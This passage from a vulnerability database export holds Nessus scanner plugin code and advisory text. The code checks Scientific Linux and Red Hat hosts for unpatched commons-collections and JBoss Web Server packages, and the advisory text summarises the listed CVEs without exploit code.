to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=3803\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45cd4a70\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:04:10", "description": "An update is now available for Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS /SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno Bock for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:httpd22", "p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd22-devel", "p-cpe:/a:redhat:enterprise_linux:httpd22-manual", "p-cpe:/a:redhat:enterprise_linux:httpd22-tools", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:mod_ldap", "p-cpe:/a:redhat:enterprise_linux:mod_ldap22", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:mod_ssl22", "p-cpe:/a:redhat:enterprise_linux:tomcat6", "p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7", "p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel", "p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2017-3113.NASL", "href": "https://www.tenable.com/plugins/nessus/104456", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:3113. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104456);\n script_version(\"3.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2016-2183\",\n \"CVE-2017-12615\",\n \"CVE-2017-12617\",\n \"CVE-2017-9788\",\n \"CVE-2017-9798\"\n );\n script_xref(name:\"RHSA\", value:\"2017:3113\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server (RHSA-2017:3113) (Optionsbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat JBoss Enterprise Web Server\n2.1.2 for RHEL 6 and Red Hat JBoss Enterprise Web Server 2.1.2 for\nRHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL)\nand Transport Layer Security (TLS) protocols, as well as a\nfull-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for\nRed Hat JBoss Web Server 2.1.2. The updates are documented in the\nRelease Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves\nas a update for Red Hat JBoss Web Server 2, and includes bug fixes,\nwhich are documented in the Release Notes document linked to in the\nReferences.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated\npackages, which resolve several security issues.\n\nSecurity Fix(es) :\n\n* It was discovered that the httpd's mod_auth_digest module did not\nproperly initialize memory before using it when processing certain\nheaders related to digest authentication. A remote attacker could\npossibly use this flaw to disclose potentially sensitive information\nor cause httpd child process to crash by sending specially crafted\nrequests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of\nthe TLS /SSL protocol. A man-in-the-middle attacker could use this\nflaw to recover some plaintext data by capturing large amounts of\nencrypted traffic between TLS/SSL server and client if the\ncommunication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and\nHanno Bock for reporting CVE-2017-9798. Upstream acknowledges\nKarthikeyan Bhargavan (Inria) and Gaetan Leurent (Inria) as the\noriginal reporters of CVE-2016-2183.\n\nBug Fix(es) :\n\n* Corruption in nodestatsmem in multiple core dumps but in different\nfunctions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated\nassembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2\n(BZ#1493075)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/3227901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:3113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-2183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9788\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9798\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-9788\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:3113\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jws-2\") || rpm_exists(release:\"RHEL7\", rpm:\"jws-2\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss Web Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if 